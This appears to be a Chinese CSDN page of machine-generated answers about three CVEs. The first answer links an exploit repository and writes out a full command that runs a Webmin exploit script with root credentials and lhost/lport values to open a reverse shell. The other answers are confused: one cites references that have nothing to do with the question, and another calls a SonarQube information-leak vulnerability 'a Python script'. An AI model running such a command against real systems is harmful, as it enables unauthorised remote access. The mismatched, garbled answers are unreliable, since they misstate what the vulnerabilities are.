CVE-2020-35606
时间: 2023-10-23 22:09:21 浏览: 55
CVE-2020-35606使用的是CVE-2019-12840的执行脚本,但是换了新的载体。利用方式还是一样的。您可以在以下链接中找到该脚本:https://github.com/puckiestyle/CVE-2020-35606。要执行该脚本,您可以使用以下命令来反弹一个shell:python CVE-2019-12840.py -u https://vulfocus.fofa.so -U root -P password -lhost x.x.x.x -lport 9897。
相关问题
CVE-2020-13249
根据提供的引用内容,没有包含关于CVE-2020-13249的信息。请提供更多相关信息以便我为您提供准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *3* [【漏洞通告】Apache DolphinScheduler高危漏洞(CVE-2020-11974、CVE-2020-13922)](https://blog.csdn.net/weixin_45728976/article/details/108537133)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
- *2* [CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE](https://download.csdn.net/download/weixin_42181545/19185756)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]
CVE-2020-27986
CVE-2020-27986是指SonarQube敏感信息泄露漏洞。根据引用的描述,它是一个Python脚本,用于检测CVE-2020-27986漏洞。具体内容可以在CSDN上查看。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *3* [CVE-2020-27986(SonarQube敏感信息泄露)漏洞复现](https://blog.csdn.net/dreamthe/article/details/121617470)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
- *2* [CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE](https://download.csdn.net/download/weixin_42181545/19185756)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]